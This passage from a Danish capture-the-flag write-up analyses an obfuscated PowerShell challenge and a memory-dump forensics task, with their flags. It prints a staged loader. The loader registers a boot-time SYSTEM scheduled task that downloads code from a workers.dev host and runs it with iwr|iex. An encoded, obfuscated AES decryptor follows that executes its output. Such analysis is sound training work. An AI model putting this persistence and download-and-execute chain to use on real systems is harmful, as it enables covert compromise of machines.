cipher_b64 = "YjdiU5+xwU9cr3cYedlgzPlFlolvLD+BdIw6E4U0tRlS4D/VE8F1nMUsatDJErDT4aiFC+mWnROMddy0x6iL4Sc96DfzWfJXnOlQWtkUBcS7Bkm950E3IDlikbq9zoW42UYF2+l6fXBvf4EMiSoOIRcpZZOGkFg1mX3TpFSGMU0OrG4+JzYSLK8tQPW2jh51I9NgwnpdaRhgZorC3LejdsXKOQGzcvtwbp7e4+Qx/XMmI5GO+owOzp3FvQkqBtSJ0wvCMZF4Ob+UI8g3tBvAh3G+RZ1/4WJB70t/zHL/DvW3UbuSNQkDS8bKNMeZJu8Nr1sxotBp4dPQNK95QPhzqemnhaqGdHjdwi5ToAFAr9OwMaL6ed3bcqLYjHUAepitMnRv5ooursKOvTO7z55vFG/x1JQMlkaUsEQY8qsWFqI/M45FzJvBygkr8vnN9h0RnDZ2CP2cB40/ZiusgxuSNL7X29MKwuA6wBla704NReGWCTMAqSz8MA0yITSgafdbL63kumPSl/7JGFo2kZN9p8tIhBbFRvZCi7pOiMRxHSOqttSdrne5BpUeeepeWIphD9ehLqzwnJWX+r2JkYOdcxLCqR19V9PSB8cDrg7yoyo4/e4eqwjR2IvL58i2PIweBNtcAZG9lzZgYkzZisS4xWRze71Q/LU2WCf/WSNKP4Lue9rmKMWkQ1z4+gMvV7cNW07sjJ5J+6f0GryWLdwGL3HM9YP3QZzkcIq5cFpSTf8eu94yw8uTs7WLCf17+I3d+2U6lrOj63c4/BdlNUVy/c/7bWiWYcfITA3Om9IbD1cUzw6cWFx2TgW80jAjkPiAJoKJ26wP+l4pqA8TvvG3XJb7KBV85AM7jx2/ZYYEAFlrjhWBFC/D3ApMkML5z2gIPgUDtfVooWa+BxaIWs0ZPz2CIu0pEH/1KH7YVRaZU46XeYG1y8oRjClgM9aXhtaTVQioY8aBcOPpZVz9/+G1Vm3t+twd/wlM7bKU8Hso/2Zp0ITlbdNikK+xiVDc/VMkXOmf7YvWaL0cj7uqS9jcYEwfa6COP1a8NmnkJWTJ47bPV8bJ5c4t96spbxCOF79oHF3VP8bDPOu2XdCmYIQ2j2ztnM/osnMftkYKHhLV7TfTusPXraKcHcvfoB4uIFLMQbbYK9W8LxAKRWUHM55bP8brP4z/SPWEqv1JjRiu9gRXtucDsTZ32SXGXiTHdviBywdKBw1Idv1liLF4wvjjrBezBGHxPcYrxL/yrQ+BZnffbhYhMw53/uHTtFzhImr9/0w1oRvvfcB+fbva5Jzt+RoSPBRSBjG6u94BhY5twv/ujSfARxBPbYg93m5RpKTaztSVH2DFbTjX5MTxX0WFzg==" # $cottage
key_b64 = "c1dOTat5fnlq0vk619S2eMF+tZRoY2UyovCrwqxgS44=" # $cool
cipherdata = base64.b64decode(cipher_b64)
key = base64.b64decode(key_b64)
iv = cipherdata[:16]
encrypted = cipherdata[16:]
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = cipher.decrypt(encrypted)
print(plaintext.rstrip(b"\x00"))
|
Dette giver os følgende output:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
$TaskName = "ExampleBootTask"
# Define action
$Action = New-ScheduledTaskAction `
-Execute "powershell.exe" `
-Argument "-NoProfile -Command `"iwr -UseBasicParsing jolly-heart-a4be.oluf-sand.workers.dev/update/32aebe97-cb2e-4507-a912-9e53e72b9106|iex`""
# Define trigger (at boot)
$Trigger = New-ScheduledTaskTrigger -AtStartup
# Define principal (SYSTEM account, highest privileges)
$Principal = New-ScheduledTaskPrincipal `
-UserId "SYSTEM" `
-LogonType ServiceAccount `
-RunLevel Highest
# If task already exists, remove it
if (Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue) {
Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false
}
# Register task
Register-ScheduledTask `
-TaskName $TaskName `
-Action $Action `
-Trigger $Trigger `
-Principal $Principal `
-Description "Runs a simple PowerShell command at system startup."
Write-Host "Scheduled task \'$TaskName\' created successfully."
|
Her ser vi en PowerShell script, der opretter en scheduled task, som kører ved system startup. Tasken kører en PowerShell kommando, der henter og eksekverer et script fra en URL. Vi bruger curl til igen at hente det script: curl -A "Mozilla/5.0 (Windows NT; Windows NT 10.0; de-DE) WindowsPowerShell/5.1.19041.5737" jolly-heart-a4be.oluf-sand.workers.dev/update/32aebe97-cb2e-4507-a912-9e53e72b9106
Dette giver os følgende output:
1
2
3
4
5
6
7
|
$dat="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"
$bytes = [Convert]::FromBase64String($dat)
$ms = New-Object IO.MemoryStream(,$bytes)
$gs = New-Object IO.Compression.GZipStream($ms,[IO.Compression.CompressionMode]::Decompress)
$sr = New-Object IO.StreamReader($gs,[Text.Encoding]::UTF8)
$result = $sr.ReadToEnd()
Invoke-Command -ScriptBlock ([scriptblock]::Create($result)) -ArgumentList @("criminal", "batting")
|
Dette giver igen et PowerShell script der laver AES-256-CBC decryption.
Klik for at udvide den rå payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
|
param (
[string]$osmosis = '',
[string]$quiche = ''
)
$economics = 'KmV9RXm9YDliWGaa8MaWo4psjnuhUmBG9Sgzyy+YEy0guhlJqv4Nm/789kl5sBxc6EjKMJP3o46bT+XumAWbC/BSZYuWBHYN+x8h8bACcYnryqOWKFdMJb4f6fnz4x9ygKvc0o4vdBFaY9qn4dkHdich3G9fhs+IVl6OnI+BuWuQ5siMWOVTga4EHeig/gwyY1hvJ1e/0eFqkFyk24e8OEh1MvYoquTJRXgUv38izdEXBgBZwrd7CdD0NlrxmYwfQs+S3aAbPGF31ilR3A1t9ifi3cYdEpkZIJ8dEDsWBUBICM3pv1leYhwCJoxbelGIeTiVOYJ/p04nLZX/mD3LV3MyYKeo4sC7QX5p3mHLIs/KE2xuCQToYujYfLS2y7PI3fu180G/oPQHO9NybSDaCqbNJ2g='
$examiner = 39162
$loud = 'UAUSi4SXhrb84owq3aAnK+1CRTwEoSle9b/8USGxG0409bb69PiMlPLyVyCoKY4e8WboziZSu3f81dAbM382ziFN6CLhuWir4HZVmDU7qHgAUuwhcvShvrsZHNxSozapAQBIEU9sQ0zziN+5c/r/kXoysu/70z8UXgduD8sKXbK5jO8K2wW7QrCjiiQJmM+CRF7Ez7wsIsPVTusd8YRsjZVYn1UmWBVegUsN8pSgrSowzpy/p8J+zOAqTEbFx9uUSel+d8S7JKANeOdcbQC/maVl+if8XUuSw3hp1WyRhyqQmb8e2pOLeuFm1CNsm2R6BqhbLg/Vf6m1JqcAFSFIEG6YsuAwZZEk1ulWerdu8R9HKJXVhW1ZZVDX+funiD3wPkd39R08Ka4JMifBXwSOVz+36O8='
function pepper([int]$i) {
council($i+37615)
semicircle($i+53814)
percent($i+34862)
wee($i+34782)
}
$cue = 'xTIqOTG/xXlvBeM42zLULcj6Qn2SyPScIMbTXUXYm9HlteBxjN4VGBk3zOb1CJ1NJVFqPmsGTdd/0Rmv/c3mqnYLqmuMbQxkNDCpi3iHH/fPcFz/cgmxYaB9WU7PAxZEU1Firj7FvNH5u3Jk5+SvDBN1GTkVZNw1/8De6++2WnyLpxAREcO3I1P4hVBDMyNqqfrH+KuuXEQeKw0PpN/6XX7Rh/X1kmNZkK624UgV6dNzRC0Eno1rvsP7MParpS8AAcvypX8dWlKSpTKXzl6iiOhfiSHBqhZmTO0hlSLQzId9mmdL+4iR3lJQurS5cxlzb9MJrDL+V3Y8GGwl0yxsnTBRbpG99DG0TRMxBEg4wNweYP+xyDIRO4fJg78ApVIem5pOpg4N3CUZv/AiurOSsxzHhIRoUFwHuZmmg2xeCjODaZEruxzH0+7FNOxSELieJi8dtms8'
function scream([int]$i) {
jockey($i+37506)
cactus($i+25237)
conscience($i+39467)
rite($i+22880)
filth($i+36123)
prove($i+31260)
gaudy($i+53677)
jog($i+14548)
veldt($i+18624)
effectiveness($i+4327)
oil($i+46879)
}
function medal([int]$i) {
relieved($i+42996)
guest($i+38890)
rider($i+8380)
date($i+12867)
oil($i+29260)
comma($i+51927)
blackberry($i+19893)
urn($i+48257)
validity($i+24155)
transom($i+35454)
bike($i+18704)
intervenor($i+22571)
bail($i+34061)
nectar($i+41359)
cathedral($i+53732)
mule($i+7269)
field($i+31089)
cling($i+43634)
streetcar($i+33257)
}
$criminal = '3meYpkmXcslAd16177iQmSS97UXP69yzAbFFFe/Vx1J+qAEIujuMGZBBRsnhu78JRaQu2OMKhdmM7xuh3/zILBf0MmN6DtHFaX6j4Zpn4DSczADjrid2h1AATGw/ggOj'
$breakable = 'H0FVl/SN2tPh6BBmIkJAfza/uTTnVTNYZeiGC9ecnvw7LpbrXj32N2seemFs46Gu2lR+x3HDzHD2ZIBSTYuZvxn+RdRermpHrAww4O9q8KqNNfOdh2D6uq53juCLhhNAmSAzqBaLHsnFGznkOzK21O/ykSVtYIIKCoxooaRTJ+iunPf7cfli3VED0DgCdDR1ylUnM8w3nQgZdzDxMgD5yk+wugjsNxOJ41e8j8qAX/uUxwnsCarDfWxx5GJWWP4R+hTFDZJU86OZPJ/Uu6qHhwimpBCMyMq98tcqZ9oemw=='
$spiffy = '9ohqylF5evGV4xxxA0Iz6Y4gsr88frcuBkJK6H4NpChsuWMZvyY1fAIIJMD6ndkj1x8cGoDSO3WfoSVlatsOmQ9I1rnIKjj4k2Y8PJ+WDHYtLdGubZwa12NYc7YlgnAhjIdAZl8wzMGaBSrEb9UVlb43ARdPPIG2MDuxCFEeyU2AYPQ7M6i1givHhB4idyj6Iy5/7M9aklzBFQPX49g/rCrR+SdosBb7y/jjOF8OFx4Tp27V1DdpDHxW3cx37QxEu9HSlOthLky4APKU+OmDbNVZGfj+P19BaKCMrBhzrPJWwaN7+HKorhnyJVundMFmG3Xa29jlgNPdJO2BkWuVO6RXJqAwKVprA1BshvdCJ9NqpXv9bw7Y7UZO/g2+8PxPdCKb74pfCt3BQ6YOcTXsqrhLvJ4W+YvGEAgmhto9Nh/X'
$dam = '5WcJXT5XwlTwAB9Aaw3F3HEhV4MY+QEyaqgUHyAF+KdevMTislQHy7SinCOqyj/v4cQcw/X9DYHxN50qxXxi4vMFI3jVih3bBFeqdMY6oQs8fBZQ1wJDbMVxNu6Zi+x/7HDQ0YkDs62qDLLqyEH+8E+iPdrM5fZmq7dphAMVy6QHxm4xNiCgPqcIlLpxKprH6Qyp2B+9WKxe0FUtIR4XHnjLAADoy3hzBTekbqTVIrH2ie9OfMHEcBtpbMDZm0eT+5hyhJ3WJ8v7SfwJjBpng+JiV/ONiVD3hGqWlBasxBA='
$kendo = 23405
$execution = 'knjaDutpAeiOXRfV7VGRjEVkMei5CkA9ru4+jXAEWmqo3nARX7/KZDQnxeFUBkozHxMW2QrfxF7rU+OIGBmw8m5Stz1gvMA5vltWs47DNwWdydfDMyuy84bB7H+3wF/o+Bmlqw4a9DBAbYVVdP09B/my8AHD78SprEwbbOM4BpQ5JiY8LSoh7ZG0VpOsPxQ03M4IH5QD7ts6n9o6V2k0BriJvz+5Itmc5zUKymwYb2kwi4h8FvRVyTXRU1PdE5MMaIYcZEYA1GkOqRXfSErX7BwLk48D9+FtXvDoplI8ECKSmdadMQQ9IXPChbe2YfoVOxgy5BL++XszYO/XgxYc8P9Mojz+cPn9a3e7bZgiuxmH0oZGlQl0kjf9AFZ2SXAISoK5A2mbOXa94PdPqoldFr0zQ9W2Jy2apU0Zo2i1pgPmz+GaGp1YONuvjqqwwCkzHRjChienspF+V08jiUd1YNMp'
$checkbook = 'mht3s29j0wxgB8Ry7'
$oil = 'sJyoPvj4kXYXoMhkngQBXvyLzuaZ5nyYz0dGjrf/rBS5sK5f2cehoQgZsAh8Pbxz5fCzj2PJWLUsmQC+NPDPGPYTqwMEdCykTZAgzJrcdUHX7te1TWQYUwvOOkKZp/yXnLEY2hdTzPMAjj53NL/bTkHXeev7Ovax8seky7otl24um4KP/31Q3wMrLTidKTgaRp+GV0HiO/rBNXyFfp7ycrtr0pbHMRr+CjYOkKZODWJxSb/p9RSj4SzllJ4='
function people([int]$i) {
faucet($i+15799)
building($i+40775)
eclipse($i+48058)
murder($i+43573)
}
function sword([int]$i) {
soap($i+31195)
temple($i+17211)
ring($i+38823)
iris($i+19017)
wheat($i+31513)
target($i+6127)
cycle($i+33408)
theory($i+24266)
clasp($i+36494)
excess($i+43498)
suffer($i+38248)
casserole($i+910)
assess($i+26116)
row($i+27653)
sub($i+8125)
blossom($i+45967)
}
$everybody = 'sswWZQ882e5'
function linkage([int]$i) {
ram($i+26216)
succinct($i+55963)
innate($i+16309)
}
$batting = 'wPIjxVmOAYoT9AaZTbfqcq9JsAxpVT4HbiEmCYgFtDE='
$colloquy = 55183
$lawsuit = '7Ab'
$feng = $osmosis
if ($osmosis -eq "") {
$feng = Read-Host -Prompt 'Variable name'
}
$pig = Get-Variable -Name $feng -ValueOnly
$pavement = $quiche
if ($quiche -eq "") {
$pavement = Read-Host -Prompt 'Key Variable name'
}
$nymph = Get-Variable -Name $pavement -ValueOnly
$reciprocity = [System.Convert]::FromBase64String($pig)
$diagram = [System.Convert]::FromBase64String($nymph)
$snowmobiling = @{TypeName="SYS"+"tem.s"+"e"+"cU"+"R"+"ItY"+".Cr"+"ypT"+"ogra"+"pHY"+".Ae"+"SMA"+"NA"+"ge"+"d";Property=@{("mOdE")=[System.Security.Cryptography.CipherMode]::CBC; Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; BlockSize=128;KeySize=256;("iv")=$reciprocity[0..15];}}
$inspiration = New-Object @snowmobiling
$inspiration.("key")=$diagram
[System.Text.Encoding]::UTF8.GetString($inspiration.("C"+"rEA"+"Te"+"decRY"+"PtOR")().TransformFinalBlock($reciprocity,16,$reciprocity.length-16)).Trim([char]0)|&((&g''"cm" ("?"+"?"+'x'))[1])
|
Fra forrige script fik vi -ArgumentList @("criminal", "batting"), så hvis vi går ud fra at $criminal er vores ciphertext og $batting er vores key, så kan vi dekryptere det ved at køre scriptet.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
import base64
from Crypto.Cipher import AES
cipher_b64 = "3meYpkmXcslAd16177iQmSS97UXP69yzAbFFFe/Vx1J+qAEIujuMGZBBRsnhu78JRaQu2OMKhdmM7xuh3/zILBf0MmN6DtHFaX6j4Zpn4DSczADjrid2h1AATGw/ggOj"
key_b64 = "wPIjxVmOAYoT9AaZTbfqcq9JsAxpVT4HbiEmCYgFtDE="
cipherdata = base64.b64decode(cipher_b64)
key = base64.b64decode(key_b64)
iv = cipherdata[:16]
encrypted = cipherdata[16:]
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = cipher.decrypt(encrypted)
print(plaintext)
|
Efter at have kørt dette script, får vi følgende output: $secret = "DDC{l1v1ng_0ff_th3_l4nd_1s_th3_b3st_f34l1ng_dc9ed4584956}"
Flag: DDC{l1v1ng_0ff_th3_l4nd_1s_th3_b3st_f34l1ng_dc9ed4584956}
Peaceful (Forensics)
I had this amazingly peaceful dream, but my memory of it is a bit off. My dream was based on events on the 14th of December. Can you help me find out what happened in my dream?
Password to the zip: QKej9r6KGAl1
Vedhæftet fil: forensics_peaceful.7z
Løsning: Jeg tror jeg fik løst denne opgave lidt ved et tilfælde, da jeg blot sad og greppede efter base64 strenge i .mem filen.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
grep -aEo '[A-Za-z0-9+/]{40,}={0,2}' flag.mem
...
/Userland/Libraries/LibGUI/TreeViewModel
/Userland/Libraries/LibGUI/TreeViewModel
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Applications/FileManager/PropertiesWindow
/Userland/Applications/FileManager/PropertiesWindow
/Userland/Applications/FileManager/PropertiesWindow
/Userland/Applications/FileManager/PropertiesWindow
/Userland/Libraries/LibGfx/ImageFormats/ImageDecoder
/Userland/Applications/FileManager/PropertiesWindow
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
ZN4Core6System6pledgeEN2AK10StringViewES2
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
/Userland/Libraries/LibShell/ImmediateFunctions
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
ZN4Core6System6pledgeEN2AK10StringViewES2
|
Det er lidt spøjst at strengen H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA kommer op så mange gange, og efter at have fyret den gennem en base64 decoder, får vi en gzip fil, som indeholder en tekstfil, og i den tekstfil er flaget: DDC{w000000w_d1d_y0u_4ctually_us3_v0l4t1l1ty} -> CyberChef Recipe
Flag: DDC{w000000w_d1d_y0u_4ctually_us3_v0l4t1l1ty}
Windows Forensics Hell (Forensics)
Full writeup available here: Windows Forensics Hell : Writeup
Reactor (Reverse Engineering)
The reactor has gone into lockdown mode. Please help us access it!
Vedhæftet fil: rev_reactor.zip
